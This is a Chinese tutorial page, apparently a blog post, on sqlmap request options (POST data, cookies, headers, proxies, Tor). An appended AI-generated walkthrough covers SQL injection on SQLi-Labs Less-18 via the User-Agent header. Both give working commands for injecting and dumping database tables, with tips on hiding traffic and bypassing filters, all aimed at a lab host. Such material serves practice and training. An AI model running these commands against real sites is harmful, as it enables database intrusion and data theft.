注入工具 -- sqlmap(设置请求参数)

我希望我是那种你一见面就觉得心动的人,而不是在权衡利弊后觉得还不错的人。。。

一、抓包

在这里插入图片描述

二、设置提交参数

sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111&passwd=222222222&submit=Submit” --baner

在这里插入图片描述

三、多个参数,指定分隔符

sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111;passwd=222222222;submit=Submit” --param-del=";" --baner

四、带cookie注入

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --cookie “uin=fasdffes; skey=fwefdsd; ptisp=cfasdfas” --banner

五、设置user-agent

–random-agent 随机UA
–user-agent=“Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36”

在这里插入图片描述

sqlmap自带的UA

六、设置host

加*或者–level 5

七、设置referer

加*或者–level 5

八、额外的http头

–headers,每个标头用换行符分割,或者直接在sqlmap.conf文件中设置
sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --headers=“Host:ww.baidu.com\nUser-agent:Firefco” -v 5

九、设置HTTP协议认证的参数:–auth-type和–auth-cred

–auth-type:Basic/Digest/NTLM
–auth-cred认证语法:username:password
弹出对话框,让输入账号和密码

十、设置http代理

–proxy http(s):ip[:端口] --proxy “http://1.2.3.4:9000”
–proxy-cred username:password
–proxy-file 设置多条代理

在这里插入图片描述

–ignore-proxy 设置忽略系统代理

十一、设置tor隐藏网络

1、安装tor
apt install tor
2、开启服务
service tor start
3、查看状态
service tor status
sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --tor --tor-type https --check-tor

十二、设置延迟

–delay 0.5 延迟0.5秒

十三、设置超时

–timeout 5 5秒超时

十四、设置随机化参数

sqlmap -u “http://192.168.1.121/sqli/less 1/?id=1” --randomize id --banner
id会变成任意值

十五、设置重试

–retries 5 重试5次

十六、日志过滤目标

在burpsuite中,保存日志,里面会有很多数据包,但是我们只探测一个
sqlmap -l log.txt --scope=“192.168.1.121”
–skip-urlencode 不进行url加密

十七、设置忽略401

–ignore-401 参数用来忽略未验证错误
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库

在这里插入图片描述

<think>好的,我现在需要帮助用户解决SQLi-Labs靶场第18关使用sqlmap进行SQL注入的问题。首先,我得回顾一下用户提供的引用内容,特别是引用[5],里面提到了第18关的解决方法。用户可能已经看过这个引用,但可能还需要更详细的步骤指导。 首先,我需要确认第18关的具体情况。根据引用[5],第18关是一个POST请求注入点,涉及User-Agent头部的注入。用户需要使用sqlmap工具,并且需要先通过Burp Suite抓取数据包,保存为txt文件,然后在User-Agent字段中标记注入点。接着,使用sqlmap-r参数指定数据包文件,并利用--current-db等参数获取数据库信息。 接下来,我需要将这个过程分解成清晰的步骤,确保用户能够一步步跟随。可能需要包括安装Burp Suite、配置代理、抓取数据包、保存文件、运行sqlmap命令等步骤。同时,用户可能需要知道如何设置代理,比如在浏览器中配置Burp Suite的监听地址和端口,以及如何处理HTTPS流量,如果需要的话。 另外,用户可能对sqlmap命令的参数不太熟悉,比如--tamper或--level等,需要解释这些参数的作用。例如,--level 2会增加测试的等级,覆盖更多的注入点。而--tamper可能在某些情况下需要,但根据引用[5],第18关不需要tamper脚本,所以可能不需要用到这个参数。 还要注意用户可能遇到的常见问题,比如数据包保存的格式是否正确,User-Agent是否正确地标记了星号*,以及如何验证注入是否成功。例如,用户可能需要检查sqlmap的输出,确认是否成功获取到数据库名或其他信息。 另外,引用中提到第18关的闭合方式是单引号',这可能意味着注入点是在User-Agent字段中使用单引号闭合的。因此,在构造payload时,sqlmap会自动处理这种闭合方式,用户不需要手动指定,但了解这一点有助于调试问题。 最后,用户可能需要一些额外的提示,比如如何提升注入的成功率,或者如何处理可能的WAF(Web应用防火墙)拦截。例如,使用--delay参数来减缓请求速度,避免被检测到,或者使用代理来隐藏流量。 总结来说,回答需要结构清晰,分步骤指导用户从抓包到运行sqlmap命令,解释关键参数,并提供注意事项和常见问题解决方法,确保用户能够顺利通过第18关。</think>### SQLi-Labs 第18关sqlmap注入解决方案 根据引用[5]的描述,第18关属于HTTP头部User-Agent字段的POST请求注入,需通过以下步骤实现自动化注入: **步骤1:准备环境** 1. 安装Burp Suite并配置浏览器代理(默认监听127.0.0.1:8080) 2. 访问第18关页面`http://[靶机IP]/sqli-labs/Less-18/`,触发正常请求 **步骤2:抓取数据包** 1. 在Burp Suite的Proxy模块拦截HTTP请求 2. 在请求头中找到User-Agent字段,在值末尾添加`*`标记注入点 ```http User-Agent: Mozilla/5.0* # 添加*作为注入标识 ``` 3. 将完整请求包保存为`less18.txt` **步骤3:执行sqlmap命令** ```bash python sqlmap.py -r less18.txt --current-db --batch ``` - `-r`:指定包含HTTP请求的文件 - `--current-db`:获取当前数据库名 - `--batch`:自动选择默认选项 **步骤4:进阶利用** ```bash # 获取所有数据库 python sqlmap.py -r less18.txt --dbs --level=2 # 获取指定数据库表 python sqlmap.py -r less18.txt -D security --tables # 获取字段数据 python sqlmap.py -r less18.txt -D security -T users --dump ``` **关键参数说明**: - `--level=2`:增加检测强度(默认检测范围不包括HTTP头部) - `--risk=3`:启用高风险测试模式(需谨慎使用) - `--tamper`:本关不需要编码脚本,但复杂场景可配合`base64encode`等脚本[^3] **注意事项**: 1. 确保靶场环境配置正确,User-Agent字段存在注入漏洞 2. 若遇到过滤规则,可尝试`--tamper=space2comment`等绕过脚本 3. 数据包中的`*`必须紧接在User-Agent值之后,如:`User-Agent: payload*` 4. 推荐配合`--flush-session`参数避免缓存影响测试结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值